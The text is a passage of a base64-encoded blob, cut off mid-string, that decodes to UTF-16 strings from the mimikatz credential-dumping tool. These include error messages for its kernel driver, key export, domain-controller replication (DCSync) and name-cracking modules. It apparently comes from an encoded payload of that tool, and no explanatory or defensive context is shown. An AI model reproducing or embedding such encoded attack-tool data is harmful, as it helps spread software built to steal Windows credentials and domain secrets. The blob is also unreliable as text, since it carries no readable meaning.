QAgADsAIABEAGUAdgBpAGMAZQBJAG8AQwBvAG4AdAByAG8AbAAgACgAMAB4ACUAMAA4AHgAKQAgADoAIAAwAHgAJQAwADgAeAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBpAG8AYwB0AGwAIAA7ACAAQwByAGUAYQB0AGUARgBpAGwAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABcAFwALgBcAG0AaQBtAGkAZAByAHYAAAAlACoAcwAqACoASwBFAFkAIAAoAGMAYQBwAGkAKQAqACoACgAAAAAAAAAAACUAKgBzACAAIABkAHcAVQBuAGkAcQB1AGUATgBhAG0AZQBMAGUAbgAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBTAGkAUAB1AGIAbABpAGMASwBlAHkATABlAG4AIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAlACoAcwAgACAAZAB3AFMAaQBQAHIAaQB2AGEAdABlAEsAZQB5AEwAZQBuACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABkAHcARQB4AFAAdQBiAGwAaQBjAEsAZQB5AEwAZQBuACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBFAHgAUAByAGkAdgBhAHQAZQBLAGUAeQBMAGUAbgAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAlACoAcwAgACAAZAB3AEgAYQBzAGgATABlAG4AIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABkAHcAUwBpAEUAeABwAG8AcgB0AEYAbABhAGcATABlAG4AIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBFAHgARQB4AHAAbwByAHQARgBsAGEAZwBMAGUAbgAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAACUAKgBzACAAIABwAFUAbgBpAHEAdQBlAE4AYQBtAGUAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAJQBTAAoAAAAlACoAcwAgACAAcABIAGEAcwBoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAACUAKgBzACAAIABwAFMAaQBQAHUAYgBsAGkAYwBLAGUAeQAgACAAIAAgACAAIAAgADoAIAAAAAAAJQAqAHMAIAAgAHAAUwBpAFAAcgBpAHYAYQB0AGUASwBlAHkAIAAgACAAIAAgACAAOgAKAAAAAAAlACoAcwAgACAAcABTAGkARQB4AHAAbwByAHQARgBsAGEAZwAgACAAIAAgACAAIAA6AAoAAAAAACUAKgBzACAAIABwAEUAeABQAHUAYgBsAGkAYwBLAGUAeQAgACAAIAAgACAAIAAgADoAIAAAAAAAJQAqAHMAIAAgAHAARQB4AFAAcgBpAHYAYQB0AGUASwBlAHkAIAAgACAAIAAgACAAOgAKAAAAAAAlACoAcwAgACAAcABFAHgARQB4AHAAbwByAHQARgBsAGEAZwAgACAAIAAgACAAIAA6AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGsAZQB5AF8AYwBuAGcAXwBjAHIAZQBhAHQAZQAgADsAIABrAHUAbABsAF8AbQBfAGsAZQB5AF8AYwBuAGcAXwBwAHIAbwBwAGUAcgB0AGkAZQBzAF8AYwByAGUAYQB0AGUAIAAoAHAAdQBiAGwAaQBjACkACgAAAAAAJQAqAHMAKgAqAEsARQBZACAAKABjAG4AZwApACoAKgAKAAAAJQAqAHMAIAAgAGQAdwBWAGUAcgBzAGkAbwBuACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAdQBuAGsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAACUAKgBzACAAIABkAHcATgBhAG0AZQBMAGUAbgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAHQAeQBwAGUAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAZAB3AFAAdQBiAGwAaQBjAFAAcgBvAHAAZQByAHQAaQBlAHMATABlAG4AIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAACUAKgBzACAAIABkAHcAUAByAGkAdgBhAHQAZQBQAHIAbwBwAGUAcgB0AGkAZQBzAEwAZQBuADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAGQAdwBQAHIAaQB2AGEAdABlAEsAZQB5AEwAZQBuACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAdQBuAGsAQQByAHIAYQB5AFsAMQA2AF0AIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAlACoAcwAgACAAcABOAGEAbQBlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAlAC4AKgBzAAoAAAAlACoAcwAgACAAcABQAHUAYgBsAGkAYwBQAHIAbwBwAGUAcgB0AGkAZQBzACAAIAAgACAAIAA6ACAAAAAlACoAcwAgACAAcABQAHIAaQB2AGEAdABlAFAAcgBvAHAAZQByAHQAaQBlAHMAIAAgACAAIAA6AAoAAAAlACoAcwAgACAAcABQAHIAaQB2AGEAdABlAEsAZQB5ACAAIAAgACAAIAAgACAAIAAgACAAIAA6AAoAAAAlACoAcwAqACoASwBFAFkAIABDAE4ARwAgAFAAUgBPAFAARQBSAFQAWQAqACoACgAAAAAAAAAAACUAKgBzACAAIABkAHcAUwB0AHIAdQBjAHQATABlAG4AIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAACUAKgBzACAAIAB0AHkAcABlACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAACUAKgBzACAAIAB1AG4AawAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAACUAKgBzACAAIABkAHcATgBhAG0AZQBMAGUAbgAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAACUAKgBzACAAIABkAHcAUAByAG8AcABlAHIAdAB5AEwAZQBuACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAHAATgBhAG0AZQAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgAAAAJQAqAHMAIAAgAHAAUAByAG8AcABlAHIAdAB5ACAAIAAgACAAIAAgACAAOgAgAAAAJQB1ACAAZgBpAGUAbABkACgAcwApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AbgBlAHQAXwBnAGUAdABEAEMAIAA7ACAARABzAEcAZQB0AEQAYwBOAGEAbQBlADoAIAAlAHUACgAAAGEAAAAiACUAcwAiACAAcwBlAHIAdgBpAGMAZQAgAHAAYQB0AGMAaABlAGQACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaABfAGcAZQBuAGUAcgBpAGMAUAByAG8AYwBlAHMAcwBPAHIAUwBlAHIAdgBpAGMAZQBGAHIAbwBtAEIAdQBpAGwAZAAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAVgBlAHIAeQBCAGEAcwBpAGMATQBvAGQAdQBsAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuAHMARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaABfAGcAZQBuAGUAcgBpAGMAUAByAG8AYwBlAHMAcwBPAHIAUwBlAHIAdgBpAGMAZQBGAHIAbwBtAEIAdQBpAGwAZAAgADsAIABTAGUAcgB2AGkAYwBlACAAaQBzACAAbgBvAHQAIAByAHUAbgBuAGkAbgBnAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AZwBlAHQAVQBuAGkAcQB1AGUARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAASQBuAGMAbwByAHIAZQBjAHQAIAB2AGUAcgBzAGkAbwBuACAAaQBuACAAcgBlAGYAZQByAGUAbgBjAGUAcwAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAE8AcABlAG4AQQBuAGQAUQB1AGUAcgB5AFcAaQB0AGgAQQBsAGwAbwBjACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIABLAE8ACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAE8AcABlAG4AQQBuAGQAUQB1AGUAcgB5AFcAaQB0AGgAQQBsAGwAbwBjACAAOwAgAHAAcgBlACAALQAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIABLAE8ACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8ATwBwAGUAbgBBAG4AZABRAHUAZQByAHkAVwBpAHQAaABBAGwAbABvAGMAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAZwBpAHMAdAByAHkAXwBSAGUAZwBPAHAAZQBuAEsAZQB5AEUAeAAgAEsATwAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AYwByAGUAYQB0AGUAIAA7ACAAUgB0AGwAQwByAGUAYQB0AGUAVQBzAGUAcgBUAGgAcgBlAGEAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBjAHIAZQBhAHQAZQAgADsAIABDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABUAGgAIABAACAAJQBwAAoARABhACAAQAAgACUAcAAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AYwByAGUAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbABfAGgAYQBuAGQAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAQwBvAGQAZQBXAGkAdAB0AGgAUABhAHQAdABlAHIAbgBSAGUAcABsAGEAYwBlACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAEMAbwBkAGUAVwBpAHQAdABoAFAAYQB0AHQAZQByAG4AUgBlAHAAbABhAGMAZQAgADsAIABrAHUAbABsAF8AbQBfAG0AZQBtAG8AcgB5AF8AYQBsAGwAbwBjACAALwAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgARQB4ACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAQwBvAGQAZQBXAGkAdAB0AGgAUABhAHQAdABlAHIAbgBSAGUAcABsAGEAYwBlACAAOwAgAE4AbwAgAGIAdQBmAGYAZQByACAAPwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBjAHIAZQBhAHQAZQBCAGkAbgBkAGkAbgBnACAAOwAgAFIAcABjAEIAaQBuAGQAaQBuAGcAUwBlAHQATwBwAHQAaQBvAG4AOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AYwByAGUAYQB0AGUAQgBpAG4AZABpAG4AZwAgADsAIABSAHAAYwBCAGkAbgBkAGkAbgBnAFMAZQB0AEEAdQB0AGgASQBuAGYAbwBFAHgAOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AYwByAGUAYQB0AGUAQgBpAG4AZABpAG4AZwAgADsAIABOAG8AIABCAGkAbgBkAGkAbgBnACEACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AYwByAGUAYQB0AGUAQgBpAG4AZABpAG4AZwAgADsAIABSAHAAYwBCAGkAbgBkAGkAbgBnAEYAcgBvAG0AUwB0AHIAaQBuAGcAQgBpAG4AZABpAG4AZwA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBjAHIAZQBhAHQAZQBCAGkAbgBkAGkAbgBnACAAOwAgAFIAcABjAFMAdAByAGkAbgBnAEIAaQBuAGQAaQBuAGcAQwBvAG0AcABvAHMAZQA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBHAGUAbgBlAHIAaQBjAF8ARABlAGMAbwBkAGUAIAA7ACAAUgBQAEMAIABFAHgAYwBlAHAAdABpAG8AbgA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAEcAZQBuAGUAcgBpAGMAXwBEAGUAYwBvAGQAZQAgADsAIABNAGUAcwBJAG4AYwByAGUAbQBlAG4AdABhAGwASABhAG4AZABsAGUAUgBlAHMAZQB0ADoAIAAlADAAOAB4AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBHAGUAbgBlAHIAaQBjAF8ARABlAGMAbwBkAGUAIAA7ACAATQBlAHMARABlAGMAbwBkAGUASQBuAGMAcgBlAG0AZQBuAHQAYQBsAEgAYQBuAGQAbABlAEMAcgBlAGEAdABlADoAIAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAEcAZQBuAGUAcgBpAGMAXwBGAHIAZQBlACAAOwAgAFIAUABDACAARQB4AGMAZQBwAHQAaQBvAG4AOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAEcAZQBuAGUAcgBpAGMAXwBGAHIAZQBlACAAOwAgAE0AZQBzAEQAZQBjAG8AZABlAEkAbgBjAHIAZQBtAGUAbgB0AGEAbABIAGEAbgBkAGwAZQBDAHIAZQBhAHQAZQA6ACAAJQAwADgAeAAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAEcAZQBuAGUAcgBpAGMAXwBFAG4AYwBvAGQAZQAgADsAIABSAFAAQwAgAEUAeABjAGUAcAB0AGkAbwBuADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8ARwBlAG4AZQByAGkAYwBfAEUAbgBjAG8AZABlACAAOwAgAE0AZQBzAEkAbgBjAHIAZQBtAGUAbgB0AGEAbABIAGEAbgBkAGwAZQBSAGUAcwBlAHQAOgAgACUAMAA4AHgACgAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAEcAZQBuAGUAcgBpAGMAXwBFAG4AYwBvAGQAZQAgADsAIABNAGUAcwBFAG4AYwBvAGQAZQBJAG4AYwByAGUAbQBlAG4AdABhAGwASABhAG4AZABsAGUAQwByAGUAYQB0AGUAOgAgACUAMAA4AHgACgAAAFAAcgBvAHQAZQBjAHQAZQBkAFMAdABvAHIAYQBnAGUAAAAAAFwAcABpAHAAZQBcAHAAcgBvAHQAZQBjAHQAZQBkAF8AcwB0AG8AcgBhAGcAZQAAAG4AYwBhAGMAbgBfAG4AcAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBiAGsAcgBwAF8AZwBlAG4AZQByAGkAYwAgADsAIABCAGEAYwBrAHUAcAByAEsAZQB5ADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBiAGsAcgBwAF8AZwBlAG4AZQByAGkAYwAgADsAIABSAFAAQwAgAEUAeABjAGUAcAB0AGkAbwBuADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUgBwAGMAUwBlAGMAdQByAGkAdAB5AEMAYQBsAGwAYgBhAGMAawAgADsAIABRAHUAZQByAHkAQwBvAG4AdABlAHgAdABBAHQAdAByAGkAYgB1AHQAZQBzACAAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBSAHAAYwBTAGUAYwB1AHIAaQB0AHkAQwBhAGwAbABiAGEAYwBrACAAOwAgAEkAXwBSAHAAYwBCAGkAbgBkAGkAbgBnAEkAbgBxAFMAZQBjAHUAcgBpAHQAeQBDAG8AbgB0AGUAeAB0ACAAJQAwADgAeAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAG8AbQBhAGkAbgBBAG4AZABVAHMAZQByAEkAbgBmAG8AcwAgADsAIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIAbwBsAGwAZQByAEkAbgBmAG8AOgAgAEQAQwAgACcAJQBzACcAIABuAG8AdAAgAGYAbwB1AG4AZAAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGcAZQB0AEQAbwBtAGEAaQBuAEEAbgBkAFUAcwBlAHIASQBuAGYAbwBzACAAOwAgAEQAbwBtAGEAaQBuAEMAbwBuAHQAcgBvAGwAbABlAHIASQBuAGYAbwA6ACAAYgBhAGQAIAB2AGUAcgBzAGkAbwBuACAAKAAlAHUAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZwBlAHQARABvAG0AYQBpAG4AQQBuAGQAVQBzAGUAcgBJAG4AZgBvAHMAIAA7ACAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcgBJAG4AZgBvADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZwBlAHQARABvAG0AYQBpAG4AQQBuAGQAVQBzAGUAcgBJAG4AZgBvAHMAIAA7ACAAUgBQAEMAIABFAHgAYwBlAHAAdABpAG8AbgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAEMAQgBpAG4AZAAgADsAIABJAG4AYwBvAHIAcgBlAGMAdAAgAEQAUgBTACAARQB4AHQAZQBuAHMAaQBvAG4AcwAgAE8AdQB0AHAAdQB0ACAAKAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGcAZQB0AEQAQwBCAGkAbgBkACAAOwAgAEkAbgBjAG8AcgByAGUAYwB0ACAARABSAFMAIABFAHgAdABlAG4AcwBpAG8AbgBzACAATwB1AHQAcAB1AHQAIABTAGkAegBlACAAKAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAEMAQgBpAG4AZAAgADsAIABOAG8AIABEAFIAUwAgAEUAeAB0AGUAbgBzAGkAbwBuAHMAIABPAHUAdABwAHUAdAAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAEMAQgBpAG4AZAAgADsAIABJAEQATABfAEQAUgBTAEIAaQBuAGQAOgAgACUAdQAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGcAZQB0AEQAQwBCAGkAbgBkACAAOwAgAFIAUABDACAARQB4AGMAZQBwAHQAaQBvAG4AIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAATgBPAF8ARQBSAFIATwBSAAAAAABFAFIAUgBPAFIAXwBSAEUAUwBPAEwAVgBJAE4ARwAAAEUAUgBSAE8AUgBfAE4ATwBUAF8ARgBPAFUATgBEAAAARQBSAFIATwBSAF8ATgBPAFQAXwBVAE4ASQBRAFUARQAAAAAARQBSAFIATwBSAF8ATgBPAF8ATQBBAFAAUABJAE4ARwAAAAAARQBSAFIATwBSAF8ARABPAE0AQQBJAE4AXwBPAE4ATABZAAAARQBSAFIATwBSAF8ATgBPAF8AUwBZAE4AVABBAEMAVABJAEMAQQBMAF8ATQBBAFAAUABJAE4ARwAAAAAARQBSAFIATwBSAF8AVABSAFUAUwBUAF8AUgBFAEYARQBSAFIAQQBMAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBDAHIAYQBjAGsATgBhAG0AZQAgADsAIABDAHIAYQBjAGsATgBhAG0AZQBzACAAKABuAGEAbQBlACAAcwB0AGEAdAB1AHMAKQA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApACAALQAgACUAcwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AQwByAGEAYwBrAE4AYQBtAGUAIAA7ACAAQwByAGEAYwBrAE4AYQBtAGUAcwA6ACAAbgBvACAAaQB0AGUAbQAhAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAEMAcgBhAGMAawBOAGEAbQBlACAAOwAgAEMAcgBhAGMAawBOAGEAbQBlAHMAOgAgAGIAYQBkACAAdgBlAHIAcwBpAG8AbgAgACgAJQB1ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AQwByAGEAYwBrAE4AYQBtAGUAIAA7ACAAQwByAGEAYwBrAE4AYQBtAGUAcwA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AQwByAGEAYwBrAE4AYQBtAGUAIAA7ACAAUgBQAEMAIABFAHgAYwBlAHAAdABpAG8AbgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBQAHIAbwBjAGUAcwBzAEcAZQB0AE4AQwBDAGgAYQBuAGcAZQBzAFIAZQBwAGwAeQBfAGQAZQBjAHIAeQBwAHQAIAA7ACAAQwBoAGUAYwBrAHMAdQBtAHMAIABkAG8AbgAnAHQAIABtAGEAdABjAGgAIAAoAEMAOgAwAHgAJQAwADgAeAAgAC0AIABSADoAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUAByAG8AYwBlAHMAcwBHAGUAdABOAEMAQwBoAGEAbgBnAGUAcwBSAGUAcABsAHkAXwBkAGUAYwByAHkAcAB0ACAAOwAgAFUAbgBhAGIAbABlACAAdABvACAAYwBhAGwAYwB1AGwAYQB0AGUAIABDAFIAQwAzADIACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUAByAG8AYwBlAHMAcwBHAGUAdABOAEMAQwBoAGEAbgBnAGUAcwBSAGUAcABsAHkAXwBkAGUAYwByAHkAcAB0ACAAOwAgAFIAdABsAEUAbgBjAHIAeQBwAHQARABlAGMAcgB5AHAAdABSAEMANAAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAFAAcgBvAGMAZQBzAHMARwBlAHQATgBDAEMAaABhAG4AZwBlAHMAUgBlAHAAbAB5AF8AZABlAGMAcgB5AHAAdAAgADsAIABOAG8AIAB2AGEAbABpAGQAIABkAGEAdABhAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAFAAcgBvAGMAZQBzAHMARwBlAHQATgBDAEMAaABhAG4AZwBlAHMAUgBlAHAAbAB5AF8AZABlAGMAcgB5AHAAdAAgADsAIABOAG8AIABTAGUAcwBzAGkAbwBuACAASwBlAHkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZgByAGUAZQBfAEQAUgBTAF8ATQBTAEcAXwBDAFIAQQBDAEsAUgBFAFAATABZAF8AZABhAHQAYQAgADsAIABuAGEAbQBlAEMAcgBhAGMAawBPAHUAdABWAGUAcgBzAGkAbwBuACAAbgBvAHQAIAB2AGEAbABpAGQAIAAoADAAeAAlADAAOAB4ACAALQAgACUAdQApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBmAHIAZQBlAF8ARABSAFMAXwBNAFMARwBfAEQAQwBJAE4ARgBPAFIARQBQAEwAWQBfAGQAYQB0AGEAIAA7ACAAVABPAEQATwAgACgAbQBhAHkAYgBlAD8AKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBmAHIAZQBlAF8ARABSAFMAXwBNAFMARwBfAEQAQwBJAE4ARgBPAFIARQBQAEwAWQBfAGQAYQB0AGEAIAA7ACAAZABjAE8AdQB0AFYAZQByAHMAaQBvAG4AIABuAG8AdAAgAHYAYQBsAGkAZAAgACgAMAB4ACUAMAA4AHgAIAAtACAAJQB1ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZgByAGUAZQBfAEQAUgBTAF8ATQBTAEcAXwBHAEUAVABDAEgARwBSAEUAUABMAFkAXwBkAGEAdABhACAAOwAgAFQATwBEAE8AIAAoAG0AYQB5AGIAZQA/ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AZgByAGUAZQBfAEQAUgBTAF8ATQBTAEcAXwBHAEUAVABDAEgARwBSAEUAUABMAFkAXwBkAGEAdABhACAAOwAgAG